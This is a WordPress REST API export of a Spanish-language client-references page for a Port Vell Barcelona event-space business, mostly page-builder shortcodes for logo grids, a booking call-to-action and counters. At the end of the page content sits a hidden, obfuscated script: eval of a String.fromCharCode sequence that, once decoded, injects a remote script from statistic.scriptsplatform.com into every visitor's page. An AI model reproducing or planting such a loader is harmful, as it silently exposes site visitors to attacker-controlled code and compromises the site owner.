{"id":13830,"date":"2023-07-25T12:39:52","date_gmt":"2023-07-25T10:39:52","guid":{"rendered":"https:\/\/portvellbcn.cat\/referencias-y-clientes\/"},"modified":"2023-07-25T12:41:09","modified_gmt":"2023-07-25T10:41:09","slug":"referencias-y-clientes","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/referencias-y-clientes\/","title":{"rendered":"Referencias y clientes"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_section css=\u00bb.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}\u00bb][vc_row css=\u00bb.vc_custom_1561104021675{padding-top: 180px !important;padding-bottom: 80px !important;}\u00bb vidbg_vc_poster=\u00bb\u00bb][vc_column width=\u00bb1\/4&#8243;][\/vc_column][vc_column width=\u00bb1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Nuestros clientes<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][vc_animated_icon icon_sharpicons=\u00bbsi-separators-wave-h\u00bb align=\u00bbcenter\u00bb color=\u00bb#ef5420&#8243; width=\u00bb96&#8243; css=\u00bb.vc_custom_1561103984529{margin-top: 50px !important;}\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243;][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614528531{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb625&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1038&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614533560{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb626&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1040&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614538645{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb627&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1041&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614550615{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb628&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1042&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb css=\u00bb.vc_custom_1487794629513{margin-top: 60px !important;}\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614555677{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb629&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1043&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614561580{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb630&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1044&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614567277{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb631&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1046&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614574714{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb632&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1048&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][\/vc_section][vc_section css=\u00bb.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}\u00bb][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614528531{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb625&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1038&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614533560{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb626&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1040&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614538645{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb627&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1041&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614550615{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb628&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1042&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb css=\u00bb.vc_custom_1487794629513{margin-top: 60px !important;}\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614555677{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb629&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1043&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614561580{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb630&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1044&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614567277{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb631&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1046&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614574714{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb632&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1048&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][\/vc_section][vc_row full_width=\u00bbstretch_row\u00bb css=\u00bb.vc_custom_1561103487014{margin-top: 100px !important;margin-bottom: 0px !important;padding-top: 140px !important;padding-bottom: 130px !important;background-color: #ed552d !important;}\u00bb][vc_column css_animation=\u00bbfadeInUp\u00bb width=\u00bb1\/2&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: left;\"><span class=\"s1\" style=\"font-size: 60px; color: #ffffff;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Reserva tu espacio en el Port Vell<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column css_animation=\u00bbfadeInUp\u00bb width=\u00bb1\/2&#8243; offset=\u00bbvc_col-lg-offset-1 vc_col-lg-4&#8243;][vc_column_text]<\/p>\n<p class=\"p1\"><span class=\"s1\" style=\"color: #ffffff;\">Podr\u00e1s organizar eventos junto al mar y al aire libre. Sea cual sea tu elecci\u00f3n, ser\u00e1 un \u00e9xito rotundo. Nuestros espacios son garant\u00eda de visibilidad y eco.<\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=\u00bbVer m\u00e1s\u00bb style=\u00bboutline\u00bb shape=\u00bbround\u00bb color=\u00bbwhite\u00bb css=\u00bb.vc_custom_1561103450826{margin-top: 30px !important;}\u00bb link=\u00bburl:https%3A%2F%2Fportvellbcn.cat%2Fformulari%2F|target:%20_blank|\u00bb][\/vc_column][\/vc_row][vc_row full_width=\u00bbstretch_row\u00bb css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1493463820342{padding-top: 170px !important;padding-bottom: 170px !important;background-color: rgba(12,12,12,0.8) !important;*background-color: rgb(12,12,12) !important;}\u00bb][vc_column css_animation=\u00bbfadeInUp\u00bb][vc_row_inner][vc_column_inner width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb680&#8243; speed=\u00bb4&#8243; font_size=\u00bb50&#8243; color=\u00bb#ffffff\u00bb css=\u00bb.vc_custom_1488377153073{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbHappy Clientes\u00bb font_container=\u00bbtag:h5|text_align:center|color:%23ffffff\u00bb use_theme_fonts=\u00bbyes\u00bb][\/vc_column_inner][vc_column_inner width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb3640&#8243; speed=\u00bb4&#8243; font_size=\u00bb50&#8243; color=\u00bb#ffffff\u00bb css=\u00bb.vc_custom_1488377064817{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbProyectos Finished\u00bb font_container=\u00bbtag:h5|text_align:center|color:%23ffffff\u00bb use_theme_fonts=\u00bbyes\u00bb][\/vc_column_inner][vc_column_inner width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb8920&#8243; speed=\u00bb4&#8243; font_size=\u00bb50&#8243; color=\u00bb#ffffff\u00bb css=\u00bb.vc_custom_1488377159924{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbTasks Completed\u00bb font_container=\u00bbtag:h5|text_align:center|color:%23ffffff\u00bb use_theme_fonts=\u00bbyes\u00bb][\/vc_column_inner][vc_column_inner width=\u00bb1\/4&#8243;][vc_counter align=\u00bbcenter\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb start=\u00bb0&#8243; end=\u00bb830&#8243; speed=\u00bb4&#8243; font_size=\u00bb50&#8243; color=\u00bb#ffffff\u00bb css=\u00bb.vc_custom_1488377164886{margin-bottom: 20px !important;}\u00bb][vc_custom_heading text=\u00bbBuyers Worldwide\u00bb font_container=\u00bbtag:h5|text_align:center|color:%23ffffff\u00bb use_theme_fonts=\u00bbyes\u00bb][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<\/p>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_section css=\u00bb.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}\u00bb][vc_row css=\u00bb.vc_custom_1561104021675{padding-top: 180px !important;padding-bottom: 80px !important;}\u00bb vidbg_vc_poster=\u00bb\u00bb][vc_column width=\u00bb1\/4&#8243;][\/vc_column][vc_column width=\u00bb1\/2&#8243;][vc_column_text] Nuestros clientes [\/vc_column_text][vc_animated_icon icon_sharpicons=\u00bbsi-separators-wave-h\u00bb align=\u00bbcenter\u00bb color=\u00bb#ef5420&#8243; width=\u00bb96&#8243; css=\u00bb.vc_custom_1561103984529{margin-top: 50px !important;}\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243;][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614528531{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb625&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1038&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614533560{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb626&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1040&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614538645{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb627&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1041&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614550615{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb628&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1042&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb css=\u00bb.vc_custom_1487794629513{margin-top: 60px !important;}\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614555677{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb629&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1043&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614561580{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb630&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1044&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614567277{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb631&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1046&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614574714{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb632&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1048&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][\/vc_section][vc_section css=\u00bb.vc_custom_1487784650904{margin-top: 120px !important;margin-bottom: 140px !important;}\u00bb][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614528531{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb625&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1038&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614533560{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb626&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1040&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614538645{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb627&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1041&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614550615{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb628&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1042&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][\/vc_row][vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css_animation=\u00bbfadeInUp\u00bb css=\u00bb.vc_custom_1487794629513{margin-top: 60px !important;}\u00bb][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614555677{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb629&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1043&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614561580{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb630&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1044&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614567277{margin-top: 70px !important;}\u00bb][vc_single_image image=\u00bb631&#8243; img_size=\u00bbfull\u00bb alignment=\u00bbcenter\u00bb onclick=\u00bbcustom_link\u00bb link=\u00bb#basement-modal-1046&#8243; el_class=\u00bbimg-opacity\u00bb][\/vc_column][vc_column width=\u00bb1\/4&#8243; css=\u00bb.vc_custom_1487614574714{margin-top: [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13830","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13830"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13830\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}